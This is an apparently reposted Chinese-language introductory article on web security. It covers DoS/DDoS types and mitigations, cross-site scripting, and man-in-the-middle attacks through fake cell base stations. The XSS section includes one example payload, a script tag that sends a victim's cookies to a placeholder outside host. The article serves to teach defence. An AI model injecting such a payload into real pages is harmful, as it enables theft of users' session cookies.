拒絕服務攻擊(DoS)
拒絕服務攻擊(Denial-of-Service Attack,DoS) 是一種常見的攻擊手段,雖然目前互聯網越來越趨向于正規化,但是對于黑產還有利用 DoS 攻擊黑吃黑的現象,比較常見的就是熱血傳奇這款游戲的私服,搭建一個私服可以獲得大額非法收入,但是因為是黑產也會經常受到黑客的攻擊,黑客攻擊后,再發郵件到管理員郵箱索取金錢,威脅用戶不盡快打款就會一直攻擊,
在過去,黑產間的攻閥,DoS 就可以作為一種常見武器,DoS 的原理就是利用大量的流量迅速向一個網站發送出去,這種流量可能是應用層的,比如大量 HTTP 請求;也可以是傳輸層,比如大量的 TCP 請求,比如 2018 年 2 月 18 日,Github 就遭受了一場超大規模的 DoS 攻擊,瞬間流量峰值達到了 1.35Tbps,之后,黑客還對 Google、亞馬遜等網站也進行了攻擊,
為了形成足夠強大的流量,攻擊者往往沒有足夠的經濟實力購買機器,而是利用中病毒、木馬的機器組織流量攻擊,這些中病毒的機器,我們俗稱“肉雞”,頂級的黑客往往控制著大量的肉雞,一聲令下,肉雞就開始瘋狂向目標發送網路封包,直到打垮目標,因為肉雞是分散在世界各地的,因此這種攻擊我們也稱為分布式拒絕服務攻擊(Distributed Denial-of-Service Attack, DDoS),
DDoS 的種類
DDoS 的種類有很多,手段也很復雜,
-
直接不停發送 Ping 訊息的,利用底層的 ICMP 協議,稱為ICMP 攻擊;
-
走 UPD 協議的,稱為UDP 洪水(UDP Flood);
-
不停利用 TCP 協議發送 SYN 訊息的,也叫SYN 攻擊;
-
模擬用戶行為,不停發帖、瀏覽帖子、瀏覽網頁、加購物車等,稱為挑戰黑洞攻擊(Challenge Collapsar),
防范措施
當遇到 DDoS 攻擊的時候,如果有所準備,就可以做到有備無患,比如說購買了防火墻,防火墻會根據特征識別出攻擊行為,通過這樣的方式將攻擊行為過濾掉,讓系統不會因為 DDoS 而過載造成崩潰,
當然如果是純粹的流量攻擊,僅僅靠防火墻是不夠的,通常一些大型互聯網公司會進行多活建設,一般是兩地三機房,分別是日常生產環境、同城災備環境和異地災備環境,遇到 DDoS 可以考慮切換流量,也能起到一定作用,
另外 CDN 在解決 DDoS 時往往也有很好的效果,畢竟 CDN 是大量快取節點,DDoS 攻擊 CDN 的時候用不上力,當然,如果資金不足以購買服務器的小團隊,可以自己實作軟體防火墻,其實就是設計一臺吞吐量極高的代理服務器,作為反向代理擋在所有服務前面,如果遇到 DDoS,代理服務器可以識別出一些特征并丟棄一些流量,
在遇到攻擊的時候,對服務適當降級也是有必要的,甚至可以犧牲一部分用戶保全另一部分用戶的正常使用,防火墻是基于特征識別,本身也會有一定的誤殺現象,在被攻擊的時候,可以人為降低判定攻擊行為的門檻,通過允許防火墻造成一部分的誤傷來識別出更多的攻擊流量,
跨站腳本攻擊(XSS)
2021 年 2 月印度的一名測驗工程師在蘋果 iCloud 官網中發現了一個跨站腳本攻擊漏洞,并向蘋果公司提交了具體的漏洞說明和觸發的操作步驟,事后,蘋果公司給這名印度人發放了 5000 美金的獎金,
跨站腳本(Cross Site Scripting),顧名思義,就是利用漏洞將腳本注入網頁中,比如提交個人資訊的輸入框,如果在服務端沒有處理好就有可能觸發跨站腳本,
假設有一個輸入個人簽名的多行文本輸入框,正常用戶會輸入幾句有趣的話,但是黑客可能會嘗試輸入:
<script>document.createElement('img').src="https://some.site.com?cookie=document.cookie"</script>
如果這段話被顯示到用戶的個人主頁,那么訪問這個用戶空間的其他用戶就會被攻擊,進而被黑客拿走 Cookie 中的關鍵資訊,
XSS 攻擊模式很簡單,就是想辦法向網站的頁面上注入腳本,總的來說,輸入框是一個重災區,目前隨著前端技術的發展,使用前端框架,比如 React 或 Vue 開發的頁面已經杜絕了被 XSS 的可能,但是有時候如果作業出現某些疏漏,還是會導致 XSS 的發生,所以正確的做法是上線前拜托安全部門的同學協助進行一些針對 XSS 漏洞的掃描,
中間人攻擊
我們國家目前在打擊網路電信詐騙案中,就有這樣一種形式,一些不法分子利用偽基站,比如找一個人多的地方,用自己的偽基站設備偽裝成基站,向用戶提供網路,一些離不法分子較近的人,手機可能會連接上偽基站,連接上后,不法分子的偽基站就成了你上網的代理,可以進行很多非法操作,因此,從這個角度看,中間人黑進你附近的網路,成為你上網的“代理”,并不是非常難的一件事情,不懂技術的犯罪分子,通過購買偽基站設備,就可以充當中間人,
在遇到中間人攻擊時,互聯網的信用體系、作業系統、瀏覽器等就會幫你把好最后一關,比如你訪問淘寶購物,中間人向你投放假網頁,瀏覽器就會去驗證這個假網頁的證書,是不是淘寶的證書,去年 Github 在國內疑似被中間人攻擊的案例中,國內很多用戶看到的現象是瀏覽器提示用戶瀏覽的網站不安全,這種情況就是瀏覽器在校對證書的時候發現了疑點,如果你上網遇到這種情況應該選擇立即關閉這個網頁,不進行后續的操作,防止被騙,
總結
生活在當今時代,作為個人,網路安全是一件大事,你的購票資訊、出行記錄、賬號密碼、位置資訊等,都需要你有防范意識,防止被不法分子拿走,在為公司作業的時候,要保管好自己的賬號,特別是你作業用的計算機,要遠離非正規渠道獲得的軟體,你的作業計算機一旦中了木馬,成了肉雞,那不法分子完全可以用你的作業計算機作為跳板,登錄公司服務器,
另一方面,作為公司和團隊,也要有較強的安全意識,當然,安全領域有自己的專業知識和人才,在互聯網產品初期,往往承擔不起昂貴的防火墻和雇傭安全專家的費用,這個時候需要開發者主動去學習安全知識,盡可能提升被攻破的成本,當業務發展到一定程度后,就需要馬上雇傭安全專家,以及購買包括防火墻在內的網路安全設備,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/287095.html
標籤:其他